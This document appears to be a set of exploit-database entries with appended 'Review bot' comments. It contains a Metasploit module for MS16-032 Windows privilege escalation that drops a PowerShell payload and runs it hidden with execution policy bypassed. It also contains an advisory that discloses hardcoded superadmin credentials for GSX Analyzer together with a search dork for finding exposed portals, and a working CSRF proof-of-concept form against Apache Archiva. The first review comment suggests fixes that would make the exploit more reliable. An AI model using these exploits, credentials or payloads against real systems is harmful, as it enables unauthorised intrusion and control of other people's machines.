include Msf::Post::Windows::ReflectiveDLLInjection
def initialize(info = {})
super(update_info(info,
'Name' => 'MS16-032 Secondary Logon Handle Privilege Escalation',
'Description' => %q{
This module exploits the lack of sanitization of standard handles in Windows' Secondary
Logon Service. The vulnerability is known to affect versions of Windows 7-10 and 2k8-2k12
32 and 64 bit. This module will only work against those versions of Windows with
Powershell 2.0 or later and systems with two or more CPU cores.
},
'License' => BSD_LICENSE,
'Author' =>
[
'James Forshaw', # twitter.com/tiraniddo
'b33f', # @FuzzySec, http://www.fuzzysecurity.com'
'khr0x40sh'
],
'References' =>
[
[ 'MS', 'MS16-032'],
[ 'CVE', '2016-0099'],
[ 'URL', 'https://twitter.com/FuzzySec/status/723254004042612736' ],
[ 'URL', 'https://googleprojectzero.blogspot.co.uk/2016/03/exploiting-leaked-thread-handle.html']
],
'DefaultOptions' =>
{
'WfsDelay' => 30,
'EXITFUNC' => 'thread'
},
'DisclosureDate' => 'Mar 21 2016',
'Platform' => [ 'win' ],
'SessionTypes' => [ 'meterpreter' ],
'Targets' =>
[
# Tested on (32 bits):
# * Windows 7 SP1
[ 'Windows x86', { 'Arch' => ARCH_X86 } ],
# Tested on (64 bits):
# * Windows 7 SP1
# * Windows 8
# * Windows 2012
[ 'Windows x64', { 'Arch' => ARCH_X86_64 } ]
],
'DefaultTarget' => 0
))
register_advanced_options(
[
OptString.new('W_PATH', [false, 'Where to write temporary powershell file', nil]),
OptBool.new( 'DRY_RUN', [false, 'Only show what would be done', false ]),
# How long until we DELETE file, we have a race condition here, so anything less than 60
# seconds might break
OptInt.new('TIMEOUT', [false, 'Execution timeout', 60])
], self.class)
end
def get_arch
arch = nil
if sysinfo["Architecture"] =~ /(wow|x)64/i
arch = ARCH_X86_64
elsif sysinfo["Architecture"] =~ /x86/i
arch = ARCH_X86
end
arch
end
def check
os = sysinfo["OS"]
if os !~ /win/i
# Non-Windows systems are definitely not affected.
return Exploit::CheckCode::Safe
end
Exploit::CheckCode::Detected
end
def exploit
if is_system?
fail_with(Failure::None, 'Session is already elevated')
end
arch1 = get_arch
if check == Exploit::CheckCode::Safe
print_error("Target is not Windows")
return
elsif arch1 == nil
print_error("Architecture could not be determined.")
return
end
# Exploit PoC from 'b33f'
ps_path = ::File.join(Msf::Config.data_directory, 'exploits', 'CVE-2016-0099', 'cve_2016_0099.ps1')
vprint_status("PS1 loaded from #{ps_path}")
ms16_032 = File.read(ps_path)
cmdstr = expand_path('%windir%') << '\\System32\\windowspowershell\\v1.0\\powershell.exe'
if datastore['TARGET'] == 0 && arch1 == ARCH_X86_64
cmdstr.gsub!("System32","SYSWOW64")
print_warning("Executing 32-bit payload on 64-bit ARCH, using SYSWOW64 powershell")
vprint_warning("#{cmdstr}")
end
# payload formatted to fit dropped text file
payl = cmd_psh_payload(payload.encoded,payload.arch,{
encode_final_payload: false,
remove_comspec: true,
method: 'old'
})
payl.sub!(/.*?(?=New-Object IO)/im, "")
payl = payl.split("';$s.")[0]
payl.gsub!("''","'")
payl = "$s=#{payl}while($true){Start-Sleep 1000};"
@upfile=Rex::Text.rand_text_alpha((rand(8)+6))+".txt"
path = datastore['W_PATH'] || pwd
@upfile = "#{path}\\#{@upfile}"
fd = session.fs.file.new(@upfile,"wb")
print_status("Writing payload file, #{@upfile}...")
fd.write(payl)
fd.close
psh_cmd = "IEX `$(gc #{@upfile})"
#lpAppName
ms16_032.gsub!("$cmd","\"#{cmdstr}\"")
#lpcommandLine - capped at 1024b
ms16_032.gsub!("$args1","\" -exec Bypass -nonI -window Hidden #{psh_cmd}\"")
print_status('Compressing script contents...')
ms16_032_c = compress_script(ms16_032)
if ms16_032_c.size > 8100
print_error("Compressed size: #{ms16_032_c.size}")
error_msg = "Compressed size may cause command to exceed "
error_msg += "cmd.exe's 8kB character limit."
print_error(error_msg)
else
print_good("Compressed size: #{ms16_032_c.size}")
end
if datastore['DRY_RUN']
print_good("cmd.exe /C powershell -exec Bypass -nonI -window Hidden #{ms16_032_c}")
return
end
print_status("Executing exploit script...")
cmd = "cmd.exe /C powershell -exec Bypass -nonI -window Hidden #{ms16_032_c}"
args = nil
begin
process = session.sys.process.execute(cmd, args, {
'Hidden' => true,
'Channelized' => false
})
rescue
print_error("An error occurred executing the script.")
end
end
def cleanup
sleep_t = datastore['TIMEOUT']
vprint_warning("Sleeping #{sleep_t} seconds before deleting #{@upfile}...")
sleep sleep_t
begin
rm_f(@upfile)
print_good("Cleaned up #{@upfile}")
rescue
print_error("There was an issue with cleanup of the powershell payload script.")
end
end
end
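Review bot: the compressed-size check at `if ms16_032_c.size > 8100` only prints an error and then falls through to `session.sys.process.execute`, so a script that exceeds cmd.exe's limit is still launched and fails at the target with no explanation; add a `return` (or `fail_with(Failure::BadConfig, error_msg)`) after `print_error(error_msg)` in that branch. The bare `rescue` around the execute call also discards the exception, so the operator never sees why the launch failed; capture it (`rescue => e`) and include `e.message` in the `print_error`. In `cleanup`, `@upfile` is nil when the method returned before the payload file was written, so `rm_f(@upfile)` raises and is swallowed by the same bare rescue; guard with `return unless @upfile`.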


@ -0,0 +1,31 @@
# Exploit Title: GSX Analyzer hardcoded superadmin credentials in Main.swf
# Google Dork: inurl:"/Main.swf?cachebuster=" (need to manually look for stringtitle "Loading GSX Analyzer ... 0%")
# Date: 12-07-16
# Exploit Author: ndevnull
# Vendor Homepage: http://www.gsx.com/products/gsx-analyzer
# Software Link: http://www.gsx.com/download-the-trial-ma
# Version: 10.12, but also found in version 11
# Tested on: Windows Server 2008
# CERT : VR-241
# CVE :
1. Description
After decompiling the SWF file "Main.swf", a hardcoded credential in one of the products of GSX, namely GSX Analyzer, has been found. Credential is a superadmin account, which is not listed as a user in the userlist, but can be used to login GSX Analyzer portals. Seemingly a backdoor or a "solution" to provide "support" from the vendor.
The found credentials are:
Username: gsxlogin
Password: gsxpassword
2. Proof of Concept
A few sites externally on the internet are affected by this incident. Presumably all of the externally disclosed GSX analyzer portals have this vulnerability.
Code snippet:
-----------------
if ((((event.getLogin().toLowerCase() == "gsxlogin")) && ((event.getPwd() == "gsxpassword")))){
-----------------
3. Solution:
Vendor has been informed on 12-06-16, also CERT has been notified with ID VR-241
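Review bot: the Solution section gives only the notification dates and no fixed version, patch or workaround, so a reader cannot tell whether 10.12 and 11 remain exposed; state the vendor's fix status (or that none was available at publication) and name an interim mitigation such as keeping the portal off the public internet and alerting on authentication attempts with the username shown in the snippet. Also worth calling out from the snippet `event.getLogin().toLowerCase() == "gsxlogin"`: the username comparison is case-insensitive while the password comparison is exact, which matters for anyone writing a detection rule on this login name. The empty `# CVE :` field should either carry the assigned identifier or say that none was requested.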

138
platforms/xml/webapps/40109.txt Executable file

@ -0,0 +1,138 @@
RCE Security Advisory
https://www.rcesecurity.com
1. ADVISORY INFORMATION
=======================
Product: Apache Archiva
Vendor URL: https://archiva.apache.org
Type: Cross-Site Request Forgery [CWE-253]
Date found: 2016-05-31
Date published: 2016-07-11
CVSSv3 Score: 5.4 (CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:N)
CVE: CVE-2016-4469
2. CREDITS
==========
This vulnerability was discovered and researched by Julien Ahrens from
RCE Security.
3. VERSIONS AFFECTED
====================
Apache Archiva v1.3.9
older versions may be affected too.
4. INTRODUCTION
===============
Apache Archiva™ is an extensible repository management software that helps
taking care of your own personal or enterprise-wide build artifact
repository. It is the perfect companion for build tools such as Maven,
Continuum, and ANT.
(from the vendor's homepage)
5. VULNERABILITY DETAILS
========================
The application basically offers a Cross-Site Request Forgery protection
using the a Struts-based token called "token". While many administrative
functionalities like adding new users are protected on this way, the
following HTTP POST-based functions are missing this token and are
therefore vulnerable to CSRF:
Adding new repository proxy connectors:
/archiva/admin/addProxyConnector_commit.action
Adding new repositories:
/archiva/admin/addRepository_commit.action
Editing existing repositories:
/archiva/admin/editRepository_commit.action
Adding legacy artifact paths:
/archiva/admin/addLegacyArtifactPath_commit.action
Changing the organizational appearance:
/archiva/admin/saveAppearance.action
Uploading new artifacts:
/archiva/upload_submit.action
The following Proof-of-Concept triggers this vulnerability and adds a new
proxy connector called "CSRF":
<html>
<body>
<form
action="http://localhost:8080/archiva/admin/addProxyConnector_commit.action"
method="POST">
<input type="hidden" name="pattern" value="" />
<input type="hidden" name="connector&#46;order" value="0" />
<input type="hidden" name="connector&#46;proxyId"
value="&#40;direct&#32;connection&#41;" />
<input type="hidden" name="connector&#46;sourceRepoId" value="CSRF" />
<input type="hidden" name="connector&#46;targetRepoId"
value="maven2&#45;repository&#46;dev&#46;java&#46;net" />
<input type="hidden"
name="connector&#46;policies&#91;&apos;propagate&#45;errors&#45;on&#45;update&apos;&#93;"
value="always" />
<input type="hidden"
name="connector&#46;policies&#91;&apos;cache&#45;failures&apos;&#93;"
value="no" />
<input type="hidden"
name="connector&#46;policies&#91;&apos;releases&apos;&#93;"
value="always" />
<input type="hidden"
name="connector&#46;policies&#91;&apos;propagate&#45;errors&apos;&#93;"
value="stop" />
<input type="hidden"
name="connector&#46;policies&#91;&apos;checksum&apos;&#93;" value="fail" />
<input type="hidden"
name="connector&#46;policies&#91;&apos;snapshots&apos;&#93;"
value="always" />
<input type="hidden" name="propertyKey" value="" />
<input type="hidden" name="propertyValue" value="" />
<input type="hidden" name="blackListPattern" value="" />
<input type="hidden" name="whiteListPattern" value="" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>
6. RISK
=======
To successfully exploit this vulnerability a user with administrative rights
must be tricked into visiting an arbitrary website while having an
authenticated session in the application.
The vulnerability allows remote attackers to perform sensitive
administrative actions like adding new repository proxy connectors, adding
new repositories, editing existing repositories, adding legacy artifact
paths, changing the organizational appearance or uploading new artifacts in
the authentication context of the targeted user.
7. SOLUTION
===========
Upgrade/Migrate to Apache Archiva 2.2.1
8. REPORT TIMELINE
==================
2016-05-31: Discovery of the vulnerability
2016-05-31: Notified vendor via public security mail address
2016-06-06: No response, sent out another notification
2016-06-10: Vendor states that this version is out of support
2016-06-21: Vendor assigns CVE-2016-4469
2016-07-11: Advisory released
9. REFERENCES
=============
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-4469
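Review bot: the Type line `Cross-Site Request Forgery [CWE-253]` cites the wrong weakness identifier; CWE-253 is "Incorrect Check of Function Return Value", and CSRF is CWE-352, so the header should be corrected before the advisory is indexed. Minor wording in section 5: "using the a Struts-based token" has a stray article, and "protected on this way" should read "protected in this way". The Solution section names Archiva 2.2.1 as the fix while the affected list covers only 1.3.9 and "older versions"; stating whether the 2.x releases before 2.2.1 were tested would make the fix boundary clearer for anyone deciding whether to upgrade.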